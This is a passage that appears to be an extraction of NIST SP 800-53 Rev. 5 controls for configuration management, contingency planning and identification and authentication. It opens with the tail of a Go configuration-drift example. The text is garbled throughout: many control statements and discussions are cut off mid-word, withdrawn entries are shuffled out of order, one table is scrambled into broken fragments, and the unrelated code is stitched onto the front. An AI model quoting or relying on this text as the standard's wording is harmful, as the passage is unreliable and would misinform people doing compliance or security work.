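		"sshd":    {"PermitRootLogin": "yes", "PasswordAuthentication": "yes"},
		"nginx":   {"server_tokens": "off", "ssl_protocols": "TLSv1.2 TLSv1.3"},
		"telnetd": {"port": "23"},
	}
	// One break-glass exception on file; PermitRootLogin=yes is not approved.
	approved := []Deviation{{"sshd", "PasswordAuthentication", "yes"}}
	for _, f := range Compare(baseline, observed, approved) {
		fmt.Printf("%-22s %-10s %-16s expected=%q observed=%q -> %s\n",
			f.Kind, f.Component, f.Setting, f.Expected, f.Observed, Response(f))
	}
}
```

A real run would feed Compare from an actual collector (package manager, configuration management agent, network scan) at the CM-8(3) frequency and write each Finding to the audit record before acting on it; the approved-deviation list is what keeps a sanctioned exception from being reported, and reverted, on every pass, while an unapproved change to the same component is still caught.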
CM-11(2) User-installed Software | Software Installation with Privileged Status
Control Text: Allow user installation of software only with explicit privileged status.
Discussion: Privileged status can be obtained, for example, by serving in the role of system administrator.
Related Controls: AC-5, AC-6.

CM-11(3) User-installed Software | Automated Enforcement and Monitoring
Control Text: Enforce and monitor compliance with software installation policies using [Assignment: organization-defined automated mechanisms].
Discussion: Organizations enforce and monitor compliance with software installation policies using automated mechanisms to more quickly detect and respond to unauthorized software installation which can be an indicator of an internal or external hostile attack.
Related Controls: None.

CM-12 Information Location
Control Text: a. Identify and document the location of [Assignment: organization-defined information] and the specific system components on which the information is processed and stored;
Discussion: Information location addresses the need to understand where information is being processed and stor
Related Controls: AC-2, AC-3, AC-4, AC-6, AC-23, CM-8, PM-5, RA-2, SA-4, SA-8, SA-17, SC-4, SC-16, SC-28, SI-4, SI-7.

CM-12(1) Information Location | Automated Tools to Support Information Location
Control Text: Use automated tools to identify [Assignment: organization-defined information by information type] on [Assignment: organization-defined system components] to ensure controls are in place to protect organizational information and individual privacy.
Discussion: The use of automated tools helps to increase the effectiveness and efficiency of the information location capability implemented within the system. Automation also helps organizations manage the data produced during information location activities and share such information across the organization. The output of automated information location tools can be used to guide and inform
Related Controls: None.

CM-13 Data Action Mapping
Control Text: Develop and document a map of system data actions.
Discussion: Data actions are system operations that process personally identifiable information. The processing o
Related Controls: AC-3, CM-4, CM-12, PM-5, PM-27, PT-2, PT-3, RA-3, RA-8.

CM-14 Signed Components
Control Text: Prevent the installation of [Assignment: organization-defined software and firmware components] with
Discussion: Software and firmware components prevented from installation unless signed with recognized and app
Related Controls: CM-7, SC-12, SC-13, SI-7.
CP-1 Policy and Procedures a. Develop, document, and disseminate to [Assignment: organization-defined personnel or roles]: Contingency planning policy and procedures address the controls in the CP family that are implemented PM-9, PS-8, SI-12.
CP-2 Contingency Plan 1. Develop
a. [Selectiona contingency
(one or more): Organization-level;
plan for the system that: Mission/business process-level; System-level] Contingency planning for systems is part of an overall program for achieving continuity of CP-3, CP-4, CP-6, CP-7, CP-8, CP-9, CP-10, CP-11, CP-13, IR-4, IR-6, IR-8, IR-9, MA-6, MP-2,
contingency planning mission
1. Identifiescontingency
essential policy that:
CP-2 (continued)
Control Text (continued): ...and business functions and associated contingency requirements;
Discussion (continued): ...operations for organizational mission and business functions. Contingency planning addresses system restoration and implementation of alternative mission or business processes when systems are compromised or breached. Contingency planning is considered throughout the system
Related Controls (continued): MP-4, MP-5, PL-2, PM-8, PM-11, SA-15, SA-20, SC-7, SC-23, SI-12.

CP-2(1) Contingency Plan | Coordinate with Related Plans
Control Text: Coordinate contingency plan development with organizational elements responsible for related plans.
Discussion: Plans that are related to contingency plans include Business Continuity Plans, Disaster Recovery Plans, Critical Infrastructure Plans, Continuity of Operations Plans, Crisis Communications Plans, Insider Threat Implementation Plans, Data Breach Response Plans, Cyber Incident Response Plans, Breach Response Plans, and Occupant Emergency Plans.
Related Controls: None.

CP-2(2) Contingency Plan | Capacity Planning
Control Text: Conduct capacity planning so that necessary capacity for information processing, telecommunication
Discussion: Capacity planning is needed because different threats can result in a reduction of the available proc
Related Controls: PE-11, PE-12, PE-13, PE-14, PE-18, SC-5.

CP-2(3) Contingency Plan | Resume Mission and Business Functions
Control Text: Plan for the resumption of [Selection: all; essential] mission and business functions within [Assignment: organization-defined time period] of contingency plan activation.
Discussion: Organizations may choose to conduct contingency planning activities to resume mission and business functions as part of business continuity planning or as part of business impact analyses. Organizations prioritize the resumption of mission and business functions. The time period for resuming mission and business functions may be dependent on the severity and extent of the
Related Controls: None.

CP-10(1) System Recovery and Reconstitution | Contingency Plan Testing
Control Text: [Withdrawn: Incorporated into CP-4.]

CP-2(5) Contingency Plan | Continue Mission and Business Functions
Control Text: Plan for the continuance of [Selection: all; essential] mission and business functions with minimal or no loss of operational continuity and sustain that continuity until full system restoration at primary processing and/or storage sites.
Discussion: Organizations may choose to conduct the contingency planning activities to continue mission and business functions as part of business continuity planning or business impact analyses. Primary processing and/or storage sites defined by organizations as part of contingency planning may change depending on the circumstances associated with the contingency.
Related Controls: None.

CP-2(6) Contingency Plan | Alternate Processing and Storage Sites
Control Text: Plan for the transfer of [Selection: all; essential] mission and business functions to alternate processing and/or storage sites with minimal or no loss of operational continuity and sustain that continuity through system restoration to primary processing and/or storage sites.
Discussion: Organizations may choose to conduct contingency planning activities for alternate processing and storage sites as part of business continuity planning or business impact analyses. Primary processing and/or storage sites defined by organizations as part of contingency planning may change depending on the circumstances associated with the contingency.
Related Controls: None.

CP-2(7) Contingency Plan | Coordinate with External Service Providers
Control Text: Coordinate the contingency plan with the contingency plans of external service providers to ensure t
Discussion: When the capability of an organization to carry out its mission and business functions is dependent on
Related Controls: SA-9.

CP-2(8) Contingency Plan | Identify Critical Assets
Control Text: Identify critical system assets supporting [Selection: all; essential] mission and business functions.
Discussion: Organizations may choose to identify critical assets as part of criticality analysis, business continu
Related Controls: CM-8, RA-9.
CP-3 Contingency Training
Control Text: a. Provide contingency training to system users consistent with assigned roles and responsibilities: 1. Within [Assignment: organization-defined time period] of assuming a contingency role or responsibility;
Discussion: Contingency training provided by organizations is linked to the assigned roles and responsibilities of organizational personnel to ensure that the appropriate content and level of detail is included in such train
Related Controls: AT-2, AT-3, AT-4, CP-2, CP-4, CP-8, IR-2, IR-4, IR-9.

CP-3(1) Contingency Training | Simulated Events
Control Text: Incorporate simulated events into contingency training to facilitate effective response by personnel in crisis situations.
Discussion: The use of simulated events creates an environment for personnel to experience actual threat events, including cyber-attacks that disable websites, ransomware attacks that encrypt data on servers, hurricanes that damage or destroy organizational facilities, or hardware or software failures.
Related Controls: None.

CP-3(2) Contingency Training | Mechanisms Used in Training Environments
Control Text: Employ mechanisms used in operations to provide a more thorough and realistic contingency training environment.
Discussion: Operational mechanisms refer to processes that have been established to accomplish an organizational goal or a system that supports a particular organizational mission or business objective. Actual mission and business processes, systems, and/or facilities may be used to generate simulated events and enhance the realism of simulated events during contingency training.
Related Controls: None.

CP-4 Contingency Plan Testing
Control Text: a. Test the contingency plan for the system [Assignment: organization-defined frequency] using the following tests to determine the effectiveness of the plan and the readiness to execute the plan: [Assignment: organization-defined tests].
Discussion: Methods for testing contingency plans to determine the effectiveness of the plans and identify potenti
Related Controls: AT-3, CP-2, CP-3, CP-8, CP-9, IR-3, IR-4, PL-2, PM-14, SR-2.

CP-4(1) Contingency Plan Testing | Coordinate with Related Plans
Control Text: Coordinate contingency plan testing with organizational elements responsible for related plans.
Discussion: Plans related to contingency planning for organizational systems include Business Continuity Plans, D
Related Controls: IR-8, PM-8.

CP-4(2) Contingency Plan Testing | Alternate Processing Site
Control Text: Test the contingency plan at the alternate processing site: (a) To familiarize contingency personnel with the facility and available resources; and
Discussion: Conditions at the alternate processing site may be significantly different than the conditions at the pr
Related Controls: CP-7.

CP-4(3) Contingency Plan Testing | Automated Testing
Control Text: Test the contingency plan using [Assignment: organization-defined automated mechanisms].
Discussion: Automated mechanisms facilitate thorough and effective testing of contingency plans by providing more complete coverage of contingency issues, selecting more realistic test scenarios and environments, and effectively stressing the system and supported mission and business functions.
Related Controls: None.


CP-4(4) Contingency Plan Testing | Full Recovery and Reconstitution
Control Text: Include a full recovery and reconstitution of the system to a known state as part of contingency plan t
Discussion: Recovery is executing contingency plan activities to restore organizational mission and business func
Related Controls: CP-10, SC-24.

CP-4(5) Contingency Plan Testing | Self-challenge
Control Text: Employ [Assignment: organization-defined mechanisms] to [Assignment: organization-defined system or system component] to disrupt and adversely affect the system or system component.
Discussion: Often, the best method of assessing system resilience is to disrupt the system in some manner. The mechanisms used by the organization could disrupt system functions or system services in many ways, including terminating or disabling critical system components, changing the configuration of system components, degrading critical functionality (e.g., restricting network bandwidth), or
Related Controls: None.

CP-10(3) System Recovery and Reconstitution | Compensating Security Controls
Control Text: [Withdrawn: Addressed through tailoring.]

CP-6 Alternate Storage Site
Control Text: a. Establish an alternate storage site, including necessary agreements to permit the storage and retrieval of system backup information; and
Discussion: Alternate storage sites are geographically distinct from primary storage sites and maintain duplicate
Related Controls: CP-2, CP-7, CP-8, CP-9, CP-10, MP-4, MP-5, PE-3, SC-36, SI-13.

CP-6(1) Alternate Storage Site | Separation from Primary Site
Control Text: Identify an alternate storage site that is sufficiently separated from the primary storage site to reduce
Discussion: Threats that affect alternate storage sites are defined in organizational risk assessments and include
Related Controls: RA-3.

CP-6(2) Alternate Storage Site | Recovery Time and Recovery Point Objectives
Control Text: Configure the alternate storage site to facilitate recovery operations in accordance with recovery time and recovery point objectives.
Discussion: Organizations establish recovery time and recovery point objectives as part of contingency planning. Configuration of the alternate storage site includes physical facilities and the systems supporting recovery operations that ensure accessibility and correct execution.
Related Controls: None.

CP-6(3) Alternate Storage Site | Accessibility
Control Text: Identify potential accessibility problems to the alternate storage site in the event of an area-wide disr
Discussion: Area-wide disruptions refer to those types of disruptions that are broad in geographic scope with such
Related Controls: RA-3.
CP-7 Alternate Processing Site
Control Text: a. Establish an alternate processing site, including necessary agreements to permit the transfer and resumption of [Assignment: organization-defined system operations] for essential mission and business functions within [Assignment: organization-defined time period consistent with recovery time and recovery point objectives] when the primary processing capabilities are unavailable;
Discussion: Alternate processing sites are geographically distinct from primary processing sites and provide proce
Related Controls: CP-2, CP-6, CP-8, CP-9, CP-10, MA-6, PE-3, PE-11, PE-12, PE-17, SC-36, SI-13.

CP-7(1) Alternate Processing Site | Separation from Primary Site
Control Text: Identify an alternate processing site that is sufficiently separated from the primary processing site to
Discussion: Threats that affect alternate processing sites are defined in organizational assessments of risk and in
Related Controls: RA-3.

CP-7(2) Alternate Processing Site | Accessibility
Control Text: Identify potential accessibility problems to alternate processing sites in the event of an area-wide disr
Discussion: Area-wide disruptions refer to those types of disruptions that are broad in geographic scope with s
Related Controls: RA-3.

CP-7(3) Alternate Processing Site | Priority of Service
Control Text: Develop alternate processing site agreements that contain priority-of-service provisions in accordance with availability requirements (including recovery time objectives).
Discussion: Priority of service agreements refer to negotiated agreements with service providers that ensure that organizations receive priority treatment consistent with their availability requirements and the availability of information resources for logical alternate processing and/or at the physical alternate processing site. Organizations establish recovery time objectives as part of contingency planning.
Related Controls: None.

CP-7(4) Alternate Processing Site | Preparation for Use
Control Text: Prepare the alternate processing site so that the site can serve as the operational site supporting ess
Discussion: Site preparation includes establishing configuration settings for systems at the alternate processing si
Related Controls: CM-2, CM-6, CP-4.

CP-10(5) System Recovery and Reconstitution | Failover Capability
Control Text: [Withdrawn: Incorporated into SI-13.]
CP-7(6) Alternate Processing Site | Inability to Return to Primary Site
Control Text: Plan and prepare for circumstances that preclude returning to the primary processing site.
Discussion: There may be situations that preclude an organization from returning to the primary processing site such as if a natural disaster (e.g., flood or a hurricane) damaged or destroyed a facility and it was determined that rebuilding in the same location was not prudent.
Related Controls: None.

CP-8 Telecommunications Services
Control Text: Establish alternate telecommunications services, including necessary agreements to permit the resump
Discussion: Telecommunications services (for data and voice) for primary and alternate processing and storage sit
Related Controls: CP-2, CP-6, CP-7, CP-11, SC-7.

CP-8(1) Telecommunications Services | Priority of Service Provisions
Control Text: (a) Develop primary and alternate telecommunications service agreements that contain priority-of-service provisions in accordance with availability requirements (including recovery time objectives); and
Discussion: Organizations consider the potential mission or business impact in situations where telecommunications service providers are servicing other organizations with similar priority of service provisions. Telecommunications Service Priority (TSP) is a Federal Communications Commission (FCC) program that directs telecommunications service providers (e.g., wireline and
Related Controls: None.

CP-8(2) Telecommunications Services | Single Points of Failure
Control Text: Obtain alternate telecommunications services to reduce the likelihood of sharing a single point of failure with primary telecommunications services.
Discussion: In certain circumstances, telecommunications service providers or services may share the same physical lines, which increases the vulnerability of a single failure point. It is important to have provider transparency for the actual physical transmission capability for telecommunication services.
Related Controls: None.

CP-8(3) Telecommunications Services | Separation of Primary and Alternate Providers
Control Text: Obtain alternate telecommunications services from providers that are separated from primary service providers to reduce susceptibility to the same threats.
Discussion: Threats that affect telecommunications services are defined in organizational assessments of risk and include natural disasters, structural failures, cyber or physical attacks, and errors of omission or commission. Organizations can reduce common susceptibilities by minimizing shared infrastructure among telecommunications service providers and achieving sufficient geographic separation
Related Controls: None.

CP-8(4) Telecommunications Services | Provider Contingency Plan
Control Text: (a) Require primary and alternate telecommunications service providers to have contingency plans; and (b) Review provider contingency plans to ensure that the plans meet organizational contingency requirements; and
Discussion: Reviews of provider contingency plans consider the proprietary nature of such plans. In some situatio
Related Controls: CP-3, CP-4.

CP-8(5) Telecommunications Services | Alternate Telecommunication Service Testing
Control Text: Test alternate telecommunication services [Assignment: organization-defined frequency].
Discussion: Alternate telecommunications services testing is arranged through contractual agreements with service
Related Controls: CP-3.
CP-9 System Backup
Control Text: a. Conduct backups of user-level information contained in [Assignment: organization-defined system components] [Assignment: organization-defined frequency consistent with recovery time and recovery point objectives];
Discussion: System-level information includes system state information, operating system software, middleware, ap
Related Controls: CP-2, CP-6, CP-10, MP-4, MP-5, SC-8, SC-12, SC-13, SI-4, SI-13.

CP-9(1) System Backup | Testing for Reliability and Integrity
Control Text: Test backup information [Assignment: organization-defined frequency] to verify media reliability and
Discussion: Organizations need assurance that backup information can be reliably retrieved. Reliability pertains
Related Controls: CP-4.

CP-9(2) System Backup | Test Restoration Using Sampling
Control Text: Use a sample of backup information in the restoration of selected system functions as part of conting
Discussion: Organizations need assurance that system functions can be restored correctly and can support establ
Related Controls: CP-4.

CP-9(3) System Backup | Separate Storage for Critical Information
Control Text: Store backup copies of [Assignment: organization-defined critical system software and other security-re
Discussion: Separate storage for critical information applies to all critical information regardless of the type
Related Controls: CM-2, CM-6, CM-8.

CP-2(4) Contingency Plan | Resume All Mission and Business Functions
Control Text: [Withdrawn: Incorporated into CP-2(3).]

CP-9(5) System Backup | Transfer to Alternate Storage Site
Control Text: Transfer system backup information to the alternate storage site [Assignment: organization-defined t
Discussion: System backup information can be transferred to alternate storage sites either electronically or by t
Related Controls: CP-7, MP-3, MP-4, MP-5.

CP-9(6) System Backup | Redundant Secondary System
Control Text: Conduct system backup by maintaining a redundant secondary system that is not collocated with the p
Discussion: The effect of system backup can be achieved by maintaining a redundant secondary system that mirrors
Related Controls: CP-7.

CP-9(7) System Backup | Dual Authorization for Deletion or Destruction
Control Text: Enforce dual authorization for the deletion or destruction of [Assignment: organization-defined back
Discussion: Dual authorization ensures that deletion or destruction of backup information cannot occur unless two
Related Controls: AC-3, AC-5, MP-2.

CP-9(8) System Backup | Cryptographic Protection
Control Text: Implement cryptographic mechanisms to prevent unauthorized disclosure and modification of [Assig
Discussion: The selection of cryptographic mechanisms is based on the need to protect the confidentiality and i
Related Controls: SC-12, SC-13, SC-28.

CP-10 System Recovery and Reconstitution
Control Text: Provide for the recovery and reconstitution of the system to a known state within [Assignment: organi
Discussion: Recovery is executing contingency plan activities to restore organizational mission and business func
Related Controls: CP-2, CP-4, CP-6, CP-7, CP-9, IR-4, SA-8, SC-24, SI-13.

CP-5 Contingency Plan Update
Control Text: [Withdrawn: Incorporated into CP-2.]

CP-10(2) System Recovery and Reconstitution | Transaction Recovery
Control Text: Implement transaction recovery for systems that are transaction-based.
Discussion: Transaction-based systems include database management systems and transaction processing systems. Mechanisms supporting transaction recovery include transaction rollback and transaction journaling.
Related Controls: None.

CP-7(5) Alternate Processing Site | Equivalent Information Security Safeguards
Control Text: [Withdrawn: Incorporated into CP-7.]

CP-10(4) System Recovery and Reconstitution | Restore Within Time Period
Control Text: Provide the capability to restore system components within [Assignment: organization-defined restor
Discussion: Restoration of system components includes reimaging, which restores the components to known, oper
Related Controls: CM-2, CM-6.

CP-9(4) System Backup | Protection from Unauthorized Modification
Control Text: [Withdrawn: Incorporated into CP-9.]

CP-10(6) System Recovery and Reconstitution | Component Protection
Control Text: Protect system components used for recovery and reconstitution.
Discussion: Protection of system recovery and reconstitution components (i.e., hardware, firmware, and software
Related Controls: AC-3, AC-6, MP-2, MP-4, PE-3, PE-6.

CP-11 Alternate Communications Protocols
Control Text: Provide the capability to employ [Assignment: organization-defined alternative communications protoc
Discussion: Contingency plans and the contingency training or testing associated with those plans incorporate an
Related Controls: CP-2, CP-8, CP-13.

CP-12 Safe Mode
Control Text: When [Assignment: organization-defined conditions] are detected, enter a safe mode of operation wit
Discussion: For systems that support critical mission and business functions—including military operations, civi
Related Controls: CM-2, SA-8, SC-24, SI-13, SI-17.

CP-13 Alternative Security Mechanisms
Control Text: Employ [Assignment: organization-defined alternative or supplemental security mechanisms] for sati
Discussion: Use of alternative security mechanisms supports system resiliency, contingency planning, and contin
Related Controls: CP-2, CP-11, SI-13.
IA-1 Policy and Procedures
Control Text: a. Develop, document, and disseminate to [Assignment: organization-defined personnel or roles]: 1. [Selection (one or more): Organization-level; Mission/business process-level; System-level] identification and authentication policy that:
Discussion: Identification and authentication policy and procedures address the controls in the IA family that ar
Related Controls: AC-1, PM-9, PS-8, SI-12.

IA-2 Identification and Authentication (Organizational Users)
Control Text: Uniquely identify and authenticate organizational users and associate that unique identification with
Discussion: Organizations can satisfy the identification and authentication requirements by complying with the requirements in HSPD 12. Organizational users include employees or individuals who organizations consider to have an equivalent status to employees (e.g., contractors and guest researchers). Unique identification and authentication of users applies to all accesses other than those that are
Related Controls: AC-2, AC-3, AC-4, AC-14, AC-17, AC-18, AU-1, AU-6, IA-4, IA-5, IA-8, MA-4, MA-5, PE-2, PL-4, SA-4, SA-8.

IA-2(1) Identification and Authentication (Organizational Users) | Multi-factor Authentication to Privileged A
Control Text: Implement multi-factor authentication for access to privileged accounts.
Discussion: Multi-factor authentication requires the use of two or more different factors to achieve authenticatio
Related Controls: AC-5, AC-6.

IA-2(2) Identification and Authentication (Organizational Users) | Multi-factor Authentication to Non-privile
Control Text: Implement multi-factor authentication for access to non-privileged accounts.
Discussion: Multi-factor authentication requires the use of two or more different factors to achieve authenticati
Related Controls: AC-5.
IA-2(11) Identification and Authentication (Organizational Users) | Remote Access — Separate Device
Control Text: [Withdrawn: Incorporated into IA-2(6).]

IA-2(3) Identification and Authentication (Organizational Users) | Local Access to Privileged Accounts
Control Text: [Withdrawn: Incorporated into IA-2(1).]

IA-2(5) Identification and Authentication (Organizational Users) | Individual Authentication with Group Authentication
Control Text: When shared accounts or authenticators are employed, require users to be individually authenticated before granting access to the shared accounts or resources.
Discussion: Individual authentication prior to shared group authentication mitigates the risk of using group accounts or authenticators.
Related Controls: None.

IA-2(6) Identification and Authentication (Organizational Users) | Access to Accounts — Separate Device
Control Text: Implement multi-factor authentication for [Selection (one or more): local; network; remote] access to [Selection (one or more): privileged accounts; non-privileged accounts] such that:
Discussion: The purpose of requiring a device that is separate from the system to which the user is attempting t
Related Controls: AC-6.

IA-2(4) Identification and Authentication (Organizational Users) | Local Access to Non-privileged Accounts
Control Text: [Withdrawn: Incorporated into IA-2(2).]

IA-2(8) Identification and Authentication (Organizational Users) | Access to Accounts — Replay Resistant
Control Text: Implement replay-resistant authentication mechanisms for access to [Selection (one or more): privileged accounts; non-privileged accounts].
Discussion: Authentication processes resist replay attacks if it is impractical to achieve successful authentications by replaying previous authentication messages. Replay-resistant techniques include protocols that use nonces or challenges such as time synchronous or cryptographic authenticators.
Related Controls: None.

IA-2(7) Identification and Authentication (Organizational Users) | Network Access to Non-privileged Accounts — Separate Device
Control Text: [Withdrawn: Incorporated into IA-2(6).]

IA-2(10) Identification and Authentication (Organizational Users) | Single Sign-on
Control Text: Provide a single sign-on capability for [Assignment: organization-defined system accounts and services].
Discussion: Single sign-on enables users to log in once and gain access to multiple system resources. Organizations consider the operational efficiencies provided by single sign-on capabilities with the risk introduced by allowing access to multiple systems via a single authentication event. Single sign-on can present opportunities to improve system security, for example by providing the ability to
Related Controls: None.

IA-2(9) Identification and Authentication (Organizational Users) | Network Access to Non-privileged Accounts — Replay Resistant
Control Text: [Withdrawn: Incorporated into IA-2(8).]

IA-2(12) Identification and Authentication (Organizational Users) | Acceptance of PIV Credentials
Control Text: Accept and electronically verify Personal Identity Verification-compliant credentials.
Discussion: Acceptance of Personal Identity Verification (PIV)-compliant credentials applies to organizations implementing logical access control and physical access control systems. PIV-compliant credentials are those credentials issued by federal agencies that conform to FIPS Publication 201 and supporting guidance documents. The adequacy and reliability of PIV card issuers are authorized
Related Controls: None.

IA-2(13) Identification and Authentication (Organizational Users) | Out-of-band Authentication
Control Text: Implement the following out-of-band authentication mechanisms under [Assignment: organization-def
Discussion: Out-of-band authentication refers to the use of two separate communication paths to identify and auth
Related Controls: IA-10, IA-11, SC-37.

IA-3 Device Identification and Authentication
Control Text: Uniquely identify and authenticate [Assignment: organization-defined devices and/or types of devices
Discussion: Devices that require unique device-to-device identification and authentication are defined by type, d
Related Controls: AC-17, AC-18, AC-19, AU-6, CA-3, CA-9, IA-4, IA-5, IA-9, IA-11, SI-4.
IA-3(1) Device Identification and Authentication | Cryptographic Bidirectional Authentication
Control Text: Authenticate [Assignment: organization-defined devices and/or types of devices] before establishing
Discussion: A local connection is a connection with a device that communicates without the use of a network. A n
Related Controls: SC-8, SC-12, SC-13.

IA-3(2) Device Identification and Authentication | Cryptographic Bidirectional Network Authentication
Control Text: [Withdrawn: Incorporated into IA-3(1).]

IA-3(3) Device Identification and Authentication | Dynamic Address Allocation
Control Text: (a) Where addresses are allocated dynamically, standardize dynamic address allocation lease information and the lease duration assigned to devices in accordance with [Assignment: organization-defined lease information and lease duration]; and
Discussion: The Dynamic Host Configuration Protocol (DHCP) is an example of a means by which clients can dyna
Related Controls: AU-2.

IA-3(4) Device Identification and Authentication | Device Attestation
Control Text: Handle device identification and authentication based on attestation by [Assignment: organization-
Discussion: Device attestation refers to the identification and authentication of a device based on its configura
Related Controls: CM-2, CM-3, CM-6.
IA-4 Identifier Management
Control Text: Manage system identifiers by: a. Receiving authorization from [Assignment: organization-defined personnel or roles] to assign an individual, group, role, service, or device identifier;
Discussion: Common device identifiers include Media Access Control (MAC) addresses, Internet Protocol (IP) address
Related Controls: AC-5, IA-2, IA-3, IA-5, IA-8, IA-9, IA-12, MA-4, PE-2, PE-3, PE-4, PL-4, PM-12, PS-3, PS-4, PS-5, SC-37.

IA-4(1) Identifier Management | Prohibit Account Identifiers as Public Identifiers
Control Text: Prohibit the use of system account identifiers that are the same as public identifiers for individual ac
Discussion: Prohibiting account identifiers as public identifiers applies to any publicly disclosed account identifi
Related Controls: AT-2, PT-7.

IA-4(2) Identifier Management | Supervisor Authorization
Control Text: [Withdrawn: Incorporated into IA-12(1).]

IA-4(3) Identifier Management | Multiple Forms of Certification
Control Text: [Withdrawn: Incorporated into IA-12(2).]

IA-4(4) Identifier Management | Identify User Status
Control Text: Manage individual identifiers by uniquely identifying each individual as [Assignment: organization-defined characteristic identifying individual status].
Discussion: Characteristics that identify the status of individuals include contractors, foreign nationals, and non-organizational users. Identifying the status of individuals by these characteristics provides additional information about the people with whom organizational personnel are communicating. For example, it might be useful for a government employee to know that one of the individuals on an
Related Controls: None.

IA-4(5) Identifier Management | Dynamic Management
Control Text: Manage individual identifiers dynamically in accordance with [Assignment: organization-defined dynam
Discussion: In contrast to conventional approaches to identification that presume static accounts for preregistered users, many distributed systems establish identifiers at runtime for entities that were previously unkno
Related Controls: AC-16.

IA-4(6) Identifier Management | Cross-organization Management
Control Text: Coordinate with the following external organizations for cross-organization management of identifier
Discussion: Cross-organization identifier management provides the capability to identify individuals, groups, role
Related Controls: AU-16, IA-2, IA-5.

IA-4(7) Identifier Management | In-person Registration
Control Text: [Withdrawn: Incorporated into IA-12(4).]

IA-4(8) Identifier Management | Pairwise Pseudonymous Identifiers
Control Text: Generate pairwise pseudonymous identifiers.
Discussion: A pairwise pseudonymous identifier is an opaque unguessable subscriber identifier generated by an ide
Related Controls: IA-5.

IA-4(9) Identifier Management | Attribute Maintenance and Protection
Control Text: Maintain the attributes for each uniquely identified individual, device, or service in [Assignment: organization-defined protected central storage].
Discussion: For each of the entities covered in IA-2, IA-3, IA-8, and IA-9, it is important to maintain the attributes for each authenticated entity on an ongoing basis in a central (protected) store.
Related Controls: None.

IA-5 Authenticator Management
Control Text: Manage system authenticators by: a. Verifying, as part of the initial authenticator distribution, the identity of the individual, group, role, service, or device receiving the authenticator;
Discussion: Authenticators include passwords, cryptographic devices, biometrics, certificates, one-time password devices, and ID badges. Device authenticators include certificates and passwords. Initial authenticator content is the actual content of the authenticator (e.g., the initial password). In contrast, the requirements for authenticator content contain specific criteria or characteristics (e.g.,
Related Controls: AC-3, AC-6, CM-6, IA-2, IA-4, IA-7, IA-8, IA-9, MA-4, PE-2, PL-4, SC-12, SC-13.

IA-5(1) Authenticator Management | Password-based Authentication
Control Text: For password-based authentication: (a) Maintain a list of commonly-used, expected, or compromised passwords and update the list [Assignment: organization-defined frequency] and when organizational passwords are suspected to have been compromised directly or indirectly;
Discussion: Password-based authentication applies to passwords regardless of whether they are used in single-fa
Related Controls: IA-6.

IA-5(2) Authenticator Management | Public Key-based Authentication
Control Text: (a) For public key-based authentication: (1) Enforce authorized access to the corresponding private key; and
Discussion: Public key cryptography is a valid authentication mechanism for individuals, machines, and devices. For
Related Controls: IA-3, SC-17.

IA-5(11) Authenticator Management | Hardware Token-based Authentication
Control Text: [Withdrawn: Incorporated into IA-2(1) and IA-2(2).]

IA-5(3) Authenticator Management | In-person or Trusted External Party Registration
Control Text: [Withdrawn: Incorporated into IA-12(4).]
IA-5(5) Authenticator Management | Change Authenticators Prior to Delivery
Control Text: Require developers and installers of system components to provide unique authenticators or change default authenticators prior to delivery and installation.
Discussion: Changing authenticators prior to the delivery and installation of system components extends the requirement for organizations to change default authenticators upon system installation by requiring developers and/or installers to provide unique authenticators or change default authenticators for system components prior to delivery and/or installation. However, it typically
Related Controls: None.

IA-5(6) Authenticator Management | Protection of Authenticators
Control Text: Protect authenticators commensurate with the security category of the information to which use of t
Discussion: For systems that contain multiple security categories of information without reliable physical or log
Related Controls: RA-2.

IA-5(7) Authenticator Management | No Embedded Unencrypted Static Authenticators
Control Text: Ensure that unencrypted static authenticators are not embedded in applications or other forms of static storage.
Discussion: In addition to applications, other forms of static storage include access scripts and function keys. Organizations exercise caution when determining whether embedded or stored authenticators are in encrypted or unencrypted form. If authenticators are used in the manner stored, then those representations are considered unencrypted authenticators.
Related Controls: None.

IA-5(8) Authenticator Management | Multiple System Accounts
Control Text: Implement [Assignment: organization-defined security controls] to manage the risk of compromise du
Discussion: When individuals have accounts on multiple systems and use the same authenticators such as password
Related Controls: PS-6.

IA-5(9) Authenticator Management | Federated Credential Management
Control Text: Use the following external organizations to federate credentials: [Assignment: organization-defined e
Discussion: Federation provides organizations with the capability to authenticate individuals and devices when con
Related Controls: AU-7, AU-16.

IA-5(10) Authenticator Management | Dynamic Credential Binding
Control Text: Bind identities and authenticators dynamically using the following rules: [Assignment: organization-de
Discussion: Authentication requires some form of binding between an identity and the authenticator that is used t
Related Controls: AU-16, IA-5.

IA-5(4) Authenticator Management | Automated Support for Password Strength Determination
Control Text: [Withdrawn: Incorporated into IA-5(1).]
IA-5(12) Authenticator Management | Biometric Authentication Performance
Control Text: For biometric-based authentication, employ mechanisms that satisfy the following biometric quality
Discussion: Unlike password-based authentication, which provides exact matches of user-input passwords to store
Related Controls: AC-7.

IA-5(13) Authenticator Management | Expiration of Cached Authenticators
Control Text: Prohibit the use of cached authenticators after [Assignment: organization-defined time period].
Discussion: Cached authenticators are used to authenticate to the local machine when the network is not available. If cached authentication information is out of date, the validity of the authentication information may be questionable.
Related Controls: None.

IA-5(14) Authenticator Management | Managing Content of PKI Trust Stores
Control Text: For PKI-based authentication, employ an organization-wide methodology for managing the content of PKI trust stores installed across all platforms, including networks, operating systems, browsers, and applications.
Discussion: An organization-wide methodology for managing the content of PKI trust stores helps improve the accuracy and currency of PKI-based authentication credentials across the organization.
Related Controls: None.

IA-5(15) Authenticator Management | GSA-approved Products and Services
Control Text: Use only General Services Administration-approved products and services for identity, credential, and access management.
Discussion: General Services Administration (GSA)-approved products and services are products and services that have been approved through the GSA conformance program, where applicable, and posted to the GSA Approved Products List. GSA provides guidance for teams to design and build functional and secure systems that comply with Federal Identity, Credential, and Access Management (FICAM)
Related Controls: None.

IA-5(16) Authenticator Management | In-person or Trusted External Party Authenticator Issuance
Control Text: Require that the issuance of [Assignment: organization-defined types of and/or specific authenticator
Discussion: Issuing authenticators in person or by a trusted external party enhances and reinforces the trustworth
Related Controls: IA-12.

IA-5(17) Authenticator Management | Presentation Attack Detection for Biometric Authenticators
Control Text: Employ presentation attack detection mechanisms for biometric-based authentication.
Discussion: Biometric characteristics do not constitute secrets. Such characteristics can be obtained by online web
Related Controls: AC-7.

5 of 2021-01-21
NIST SP 800-53, Revision 5, Security and Privacy Controls for Information Systems and Organizations

IA-5(18) Authenticator Management | Password Managers
Control Text: (a) Employ [Assignment: organization-defined password managers] to generate and manage passwords; and
Discussion: For systems where static passwords are employed, it is often a challenge to ensure that the passwords are suitably complex and that the same passwords are not employed on multiple systems. A password manager is a solution to this problem as it automatically generates and stores strong and different passwords for various accounts. A potential risk of using password managers is…
Related Controls: None.

